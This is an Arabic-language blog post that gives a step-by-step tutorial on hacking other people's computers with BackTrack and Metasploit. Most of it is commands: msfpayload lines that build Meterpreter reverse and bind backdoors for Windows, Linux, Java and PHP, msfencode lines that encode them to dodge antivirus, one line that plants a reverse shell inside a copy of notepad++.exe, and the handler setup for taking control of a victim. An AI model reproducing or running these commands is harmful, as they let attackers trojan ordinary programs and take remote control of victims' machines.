شرح كامل لاختراق الاجهزة بالباكتراك @اختراق داخلي و خارجي@ --روهاك

مواضيع مفضلة

شرح كامل لاختراق الاجهزة بالباكتراك @اختراق داخلي و خارجي@ --روهاك

بسم الله الرحمن الرحيم
و السلام عليكم و رحمة الله و بركاته


اليوم اخواني ساضع درس مهم لطريقة اختراق الاجهزة
بالياكتراك عن طريق الاختراق الخارجي و الداخلي
كما  سيتم شرح طريقة صتاعة الباكدور بجميع الصيغ

الشرح سهل جدا ويتطلب منك التوفر على نظام الباكتراك
وادا اردت شرح طريقة التنصيب قم بالضغط على احدى
الشروحات التالية

الان اخواني ساترككم مع الشرح بالفيديو على اليوتوب





مستلزمات : بورت مفتوح في حالة اتصال عكسي 

تبيت الضحايا : ايبي ضحية وايبي تبعك يجب ان يكونان مثبتين او بعد اختراق ترفع سرفر ﻻي برنامج اختراق 

------------------------------------------------msfpayload ------------------------------------------

msfpayload -l 

معرفة الخيارت الخاصة بكل بايلود 
msfpayload windows/shell_bind_tcp O

--------------------------------------------windows backdoor--------------------------------------

بابلود يعتمد على اتصال عكسي 
msfpayload windows/meterpreter/reverse_tcp lhost= lport=  X > back.exe 
اتصال مباشر 
--> msfpayload windows/meterpreter/bind_tcp lport= X > back.exe 

------------------------------------------

تنصت على الهدف في حالة بايلود perl / ruby /php 
nc  ip port



------------------------------------------------مرحلة التشفير------------------------------------------

msfencode -l
امر التشفير في الميتا او في كونسول 
msfencode -t exe -x back.exe  -o back_crypt.exe -e x86/shikata_ga_nai -c 3 
 حقن الباكدور في ملف exe  مع تشفيرا 
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.191 LPORT=443 R | msfencode -t exe -x notepad++.exe  -o notepad++_crypt.exe -e x86/shikata_ga_nai -c 3
-->



------------------------------------------Linux backdoor--------------------------------------


msfpayload linux/x86/meterpreter/bind_tcp LPORT=80 R | msfencode -t elf > linux_meterpreter

 chmod u+x linux_meterpreter
./linux_meterpreter

------------------------------------------java backdoor--------------------------------------

./msfpayload java/meterpreter/reverse_tcp LHOST= LPORT= J > back.jar

./msfpayload java/meterpreter/bind_tcp  LPORT= J > back.jar

------------------------------------------php Backdoor--------------------------------------

msfpayload php/meterpreter/reverse_tcp LHOST= LPORT= R > back.php 
شفره ب base 64 بنفسك 
الأن طريقة ربط اتصال مع الهدف 
msfconsole
 use exploit/multi/handler
use multi/handler
set PAYLOAD البايلود الذي وضعت 
set LPORT البورت
set RHOST [ايبي الهدف ]

---------------------------------------------------------------------------------------------------------------
Arabezy--Arabezy--Arabezy-Arabezy--Arabezy--Arabezy--Arabezy--Arabezy
----------------------------------------------------------------------------------------------------------------
والان مع نهاية الدرس
 اتمنى ان يعجبكم الشرح ولا تنسو
 اخواني الضغط على لايك او شير
ادا اعجبك الموضوع و من هنا اشكر صاحب الفيديو

إرسال تعليق

المشاركة على واتساب متوفرة فقط في الهواتف